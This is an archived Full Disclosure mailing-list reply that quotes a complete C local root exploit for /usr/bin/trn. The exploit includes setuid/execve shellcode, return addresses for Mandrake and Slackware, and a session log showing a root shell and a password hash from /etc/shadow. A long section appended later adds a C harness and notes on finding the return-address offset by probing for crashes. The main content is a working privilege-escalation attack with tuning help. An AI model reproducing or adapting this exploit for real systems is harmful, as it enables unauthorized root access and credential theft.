Full Disclosure mailing list archives

Re: /usr/bin/trn local root exploit


From: msh at datakill <msh () datakill us>
Date: Wed, 26 Jan 2005 07:05:27 -0500

I just tested this on Slackware 10 and I get nothing but Segmentation
Faults. I see that you have the RET value filled in, but how am I to
calculate what to use for the BOO? You use 142 and 128 in the example.

On Wed, Jan 26, 2005 at 08:27:28AM +0000, Z z a g o r R wrote:
/*
/usr/bin/trn local root exploit
By ZzagorR - http://www.rootbinbash.com
*/
/*
sh-2.05b$ ./trn
 usage   : ./trn ret buf
 example : ./trn 0xbfffff64
 [+] mandrake   9.2  = 0xbfffff96
 [+] slackware 10.0.0= 0xbfffff98
 [+] slackware  9.1.0= 0xbfffff84
sh-2.05b$
sh-2.05b$ ./trn 0xbfffff84 128
 [BOO  %] 128
 [RET  %] bfffff84
sh-2.05b#
sh-2.05b# id
 uid=0(root) gid=98(nobody) groups=98(nobody)
sh-2.05b# cat /etc/shadow
 root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0:::::
TEST :
MANDRAKE 9.2
SLACKWARE 10.0.0
SLACKWARE 9.1.0
http://www.rootbinbas.com/d0kum4n/trn-test.txt
BOO:
$trn `perl -e 'print "A" x 120'`
$trn `perl -e 'print "A" x 124'`
$trn `perl -e 'print "A" x 128'`
 Segmentation fault
BOO=128
*/

#include <stdio.h>
#include <stdlib.h>     /* exit, atoi, strtoul */
#include <string.h>
#include <unistd.h>     /* execl */
#define NEREDE "/usr/bin/trn"

/* Linux/x86 shellcode: setuid(0), then execve("/bin//sh", ["/bin//sh"], NULL) */
char caylarbeles[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"   /* xor eax,eax; xor ebx,ebx; mov al,23; int 0x80   -> setuid(0) */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"   /* xor eax,eax; push eax; push "//sh"                          */
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"   /* push "/bin"; mov ebx,esp; push eax                          */
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";  /* push ebx; mov ecx,esp; cdq; mov al,11; int 0x80 -> execve */

int main(int argc, char *argv[]){
 int bizim;
 char bufe[1000];
 char *tayfasi;

 if (argc < 3) {
  printf ("{           trn l0c4l r00t 3xpl01t          }\n");
  printf ("{  By ZzagorR - http://www.rootbinbash.com  }\n");
  printf ("{  usage   : %s ret buf                  }\n",argv[0]);
  printf ("{  example : %s 0xbfffff99 142           }\n",argv[0]);
  printf ("{  mandrake   9.2   = 0xbfffff96            }\n");
  printf ("{  slackware 10.0.0 = 0xbfffff98            }\n");
  printf ("{  slackware  9.1.0 = 0xbfffff84            }\n");
  exit(1);
 }else{
  unsigned long RET=strtoul(argv[1], NULL, 16);   /* address the smashed frame returns into */
  int BOO = atoi(argv[2]);                        /* offset of the saved return address in the argument */
  printf ("[BOO  %%] %i\n",BOO);
  printf ("[RET  %%] %lx\n",RET);
  tayfasi = bufe;
  /* 256-byte argument: 'A' (inc ecx) padding, shellcode in the last bytes */
  memset(bufe, 0x41,256-strlen(caylarbeles));
  sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles);
  /* stamp RET over the two 4-byte words at BOO and BOO+4 */
  for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 )
   *(long*)(tayfasi+bizim) = RET;
  execl(NEREDE, NEREDE , bufe, (char *)NULL);
 }
 return 0;
}


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



-- 
 _________________________
|                         |
|   http://datakill.us    |   
| irc.datakill.us #dkchat |
|_________________________|
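The reply asks how BOO is calculated, and the quoted post's comment block shows the method: lengthen the "A" string in steps until the target segfaults, and the first fatal length is the offset of the saved return address. The harness below is an added example, not code from the post or from trn: vuln() is a constructed stand-in for the unchecked copy (a 64-byte stack buffer filled by a length-driven memcpy rather than strcpy, so the return address is replaced a whole word at a time and the crash is deterministic), and probe(), find_boo() and ret_slot_offset() are hypothetical helper names. It assumes Linux on x86-64 with gcc or clang; the search needs only the crash signal, not the stack address, so ASLR does not matter here. Because the post's target is 32-bit its step is 4; on x86-64 a stack word is 8 bytes, so this version steps by 8.

```c
/* boo_probe.c: find the "BOO" the way the quoted post does, by growing the
 * input until a forked copy of the vulnerable routine dies, then check the
 * answer against the real distance to the saved return address.
 * Constructed example for Linux/x86-64 (gcc or clang); vuln() stands in for
 * the unchecked copy inside trn, it is not trn's code. */
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define BUFSZ 64            /* stack buffer that vuln() overflows */
#define SCAN_BYTES 256      /* how far above buf to look for the return address */

/* Distance from buf[0] to the saved return address, measured by vuln() on a
 * non-overflowing call.  This is the quantity the post calls BOO. */
static size_t g_ret_off;

/* Stand-in for the overflowing copy.  Length-driven (like read()) instead of
 * strcpy(), so the saved return address is replaced a whole word at a time:
 * 0x4141414141414141 is non-canonical on x86-64 and returning to it faults. */
__attribute__((noinline))
static void vuln(const char *data, size_t len)
{
    char buf[BUFSZ];
    char *volatile base = buf;      /* hide buf's bounds from the optimiser */
    void *ret = __builtin_return_address(0);

    /* Record where the return address really sits, for the check below. */
    for (size_t off = BUFSZ; off < BUFSZ + SCAN_BYTES; off += sizeof(void *)) {
        void *w;
        memcpy(&w, base + off, sizeof w);
        if (w == ret) { g_ret_off = off; break; }
    }
    memcpy(buf, data, len);         /* no bounds check: the bug */
    __asm__ volatile("" : : "r"(buf) : "memory");   /* keep the copy alive */
}

/* Run vuln() on 'A' x len in a child.  Returns the signal that killed the
 * child, 0 if it exited normally, -1 if the harness itself failed. */
int probe(size_t len)
{
    char *data = malloc(len ? len : 1);
    if (!data) return -1;
    memset(data, 'A', len);
    pid_t pid = fork();
    if (pid < 0) { free(data); return -1; }
    if (pid == 0) {
        vuln(data, len);
        _exit(0);                   /* survived: this length is too short */
    }
    free(data);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}

/* The post's search: try start, start+step, ... until the target dies.
 * Returns the first fatal length (the BOO) and its signal, or 0 if none. */
size_t find_boo(size_t start, size_t limit, size_t step, int *sig_out)
{
    for (size_t len = start; len <= limit; len += step) {
        int sig = probe(len);
        if (sig > 0) {
            if (sig_out) *sig_out = sig;
            return len;
        }
    }
    return 0;
}

/* Ground truth: call vuln() without overflowing so it records the real
 * offset of the saved return address. */
size_t ret_slot_offset(void)
{
    static volatile size_t calib_len = 8;   /* volatile: no constant folding */
    char calib[8];
    memset(calib, 'A', sizeof calib);
    g_ret_off = 0;
    vuln(calib, calib_len);
    return g_ret_off;
}

int main(void)
{
    int sig = 0;
    size_t off = ret_slot_offset();
    size_t boo = find_boo(8, 512, 8, &sig);
    printf("buffer %d bytes, saved return address at buf+%zu\n", BUFSZ, off);
    if (boo)
        printf("first fatal length: %zu (killed by signal %d)\n", boo, sig);
    else
        printf("no crash up to 512 bytes\n");
    return boo ? 0 : 1;
}
```

Two things the probe makes visible that the post's one-line recipe does not. First, the first fatal length is only approximately the offset: without a stack protector it is the word that lands squarely on the saved return address (offset plus one word), and with gcc's stack protector the child dies of SIGABRT a word or two earlier, when the canary below the return address is clobbered. That is presumably why the exploit stamps RET at both BOO and BOO+4: a guess one step short still overwrites the slot. Second, the crash signal itself is diagnostic. SIGSEGV on return means the slot was reached; SIGABRT with a "stack smashing detected" message means a protected build, where a return-address overwrite of this kind is not usable as is.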